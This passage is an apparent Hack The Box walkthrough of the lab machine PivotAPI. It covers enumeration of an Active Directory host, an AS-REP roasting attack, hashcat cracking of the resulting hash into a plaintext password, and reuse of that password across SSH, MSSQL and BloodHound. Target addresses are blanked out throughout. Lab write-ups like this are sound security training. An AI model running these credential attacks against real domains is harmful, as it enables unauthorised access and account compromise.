Hero Image
[HTB] Machine: PivotAPI



  • nmap
└─$ nmap -Pn -p- --min-rate 5000                                                                              
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-06 03:10 BST
Nmap scan report for (
Host is up (0.10s latency).
Not shown: 65515 filtered tcp ports (no-response)
21/tcp    open  ftp
22/tcp    open  ssh
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49708/tcp open  unknown
52843/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 65.93 seconds
└─$ nmap -Pn -p21,22,53,88,135,139,389,445,464,593,636,1433,3268,3269,9389 -sC -sV --min-rate 5000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-06 03:12 BST
Nmap scan report for (
Host is up (0.10s latency).

21/tcp   open     ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-19-21  03:06PM               103106
| 02-19-21  03:06PM               656029 28475-linux-stack-based-buffer-overflows.pdf
| 02-19-21  12:55PM              1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
| 02-19-21  03:06PM              1018160 ExploitingSoftware-Ch07.pdf
| 08-08-20  01:18PM               219091 notes1.pdf
| 08-08-20  01:34PM               279445 notes2.pdf
| 08-08-20  01:41PM                  105 README.txt
|_02-19-21  03:06PM              1301120 RHUL-MA-2009-06.pdf
22/tcp   open     ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   3072 fa:19:bb:8d:b6:b6:fb:97:7e:17:80:f5:df:fd:7f:d2 (RSA)
|   256 44:d0:8b:cc:0a:4e:cd:2b:de:e8:3a:6e:ae:65:dc:10 (ECDSA)
|_  256 93:bd:b6:e2:36:ce:72:45:6c:1d:46:60:dd:08:6a:44 (ED25519)
53/tcp   open     domain        Simple DNS Plus
88/tcp   open     kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-05 19:12:42Z)
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  filtered ldap
445/tcp  open     microsoft-ds?
464/tcp  filtered kpasswd5
593/tcp  open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open     tcpwrapped
1433/tcp open     ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|     Target_Name: LICORDEBELLOTA
|     NetBIOS_Computer_Name: PIVOTAPI
|     DNS_Domain_Name: LicorDeBellota.htb
|     DNS_Computer_Name: PivotAPI.LicorDeBellota.htb
|     DNS_Tree_Name: LicorDeBellota.htb
|_    Product_Version: 10.0.17763
| ms-sql-info: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-05T19:05:41
|_Not valid after:  2053-10-05T19:05:41
|_ssl-date: 2023-10-05T19:13:30+00:00; -7h00m01s from scanner time.
3268/tcp open     ldap          Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
3269/tcp open     tcpwrapped
9389/tcp open     mc-nmf        .NET Message Framing
Service Info: Host: PIVOTAPI; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-10-05T19:12:54
|_  start_date: N/A
|_clock-skew: mean: -7h00m01s, deviation: 0s, median: -7h00m01s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.10 seconds
  • smb
└─$ smbclient -N -L //                                                              
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
  • dns
└─$ dig axfr LicorDeBellota.htb @PivotAPI.LicorDeBellota.htb                                                   

; <<>> DiG 9.19.17-1-Debian <<>> axfr LicorDeBellota.htb @PivotAPI.LicorDeBellota.htb
;; global options: +cmd
; Transfer failed.
  • ldapsearch
└─$ ldapsearch -H ldap://LicorDeBellota.htb -x -s base namingcontexts           
# extended LDIF
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 

namingcontexts: DC=LicorDeBellota,DC=htb
namingcontexts: CN=Configuration,DC=LicorDeBellota,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=LicorDeBellota,DC=htb
namingcontexts: DC=DomainDnsZones,DC=LicorDeBellota,DC=htb
namingcontexts: DC=ForestDnsZones,DC=LicorDeBellota,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
└─$ ldapsearch -H ldap://LicorDeBellota.htb -x -b "DC=LicorDeBellota,DC=htb"
# extended LDIF
# LDAPv3
# base <DC=LicorDeBellota,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1
  • No results for rpc
  • ftp
└─$ ftp anonymous@
Connected to
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||57367|)
150 Opening ASCII mode data connection.
02-19-21  03:06PM               103106
02-19-21  03:06PM               656029 28475-linux-stack-based-buffer-overflows.pdf
02-19-21  12:55PM              1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
02-19-21  03:06PM              1018160 ExploitingSoftware-Ch07.pdf
08-08-20  01:18PM               219091 notes1.pdf
08-08-20  01:34PM               279445 notes2.pdf
08-08-20  01:41PM                  105 README.txt
02-19-21  03:06PM              1301120 RHUL-MA-2009-06.pdf
226 Transfer complete.
  • Running exiftool on pdf files shows LicorDeBellota.htb\kaorz
======== notes2.pdf
ExifTool Version Number         : 12.67
File Name                       : notes2.pdf
Directory                       : .
File Size                       : 279 kB
File Modification Date/Time     : 2020:08:08 12:34:25+01:00
File Access Date/Time           : 2023:10:06 19:12:03+01:00
File Inode Change Date/Time     : 2023:10:06 19:12:03+01:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 5
XMP Toolkit                     : Image::ExifTool 12.03
Creator                         : Kaorz
Publisher                       : LicorDeBellota.htb
Producer                        : cairo 1.10.2 (http://cairographics.org)


  • Let’s check if user is AS-REP-roastable
└─$ impacket-GetNPUsers -dc-ip PivotAPI.LicorDeBellota.htb LicorDeBellota.htb/kaorz -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for kaorz
  • Let’s crack it
    • kaorz:Roper4155
└─$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 4.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
* Device #1: cpu-sandybridge-12th Gen Intel(R) Core(TM) i5-12400, 1435/2934 MB (512 MB allocatable), 2MCU
  • The creds didn’t work for ssh
└─$ sshpass -p 'Roper4155' ssh kaorz@
Warning: Permanently added '' (ED25519) to the list of known hosts.
Permission denied, please try again.
  • No SPNs
└─$ impacket-GetUserSPNs LicorDeBellota.htb/Kaorz:'Roper4155' -dc-ip  
Impacket v0.11.0 - Copyright 2023 Fortra

No entries found!
  • No access to mysql
└─$ impacket-mssqlclient LicorDeBellota.htb/Kaorz:'Roper4155'@ -windows-auth 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[-] ERROR(PIVOTAPI\SQLEXPRESS): Line 1: Error de inicio de sesión del usuario 'LICORDEBELLOTA\Kaorz'.


  • Let’s check bloodhound
└─$ bloodhound-python -u kaorz -p 'Roper4155' -d licordebellota.htb -dc licordebellota.htb -ns --zip
INFO: Found AD domain: licordebellota.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: licordebellota.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Found 28 users
INFO: Connecting to LDAP server: licordebellota.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 58 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: PivotAPI.LicorDeBellota.htb
INFO: Done in 00M 16S
INFO: Compressing output into 20231007112624_bloodhound.zip
  • Nothing interesting
    • Domain Users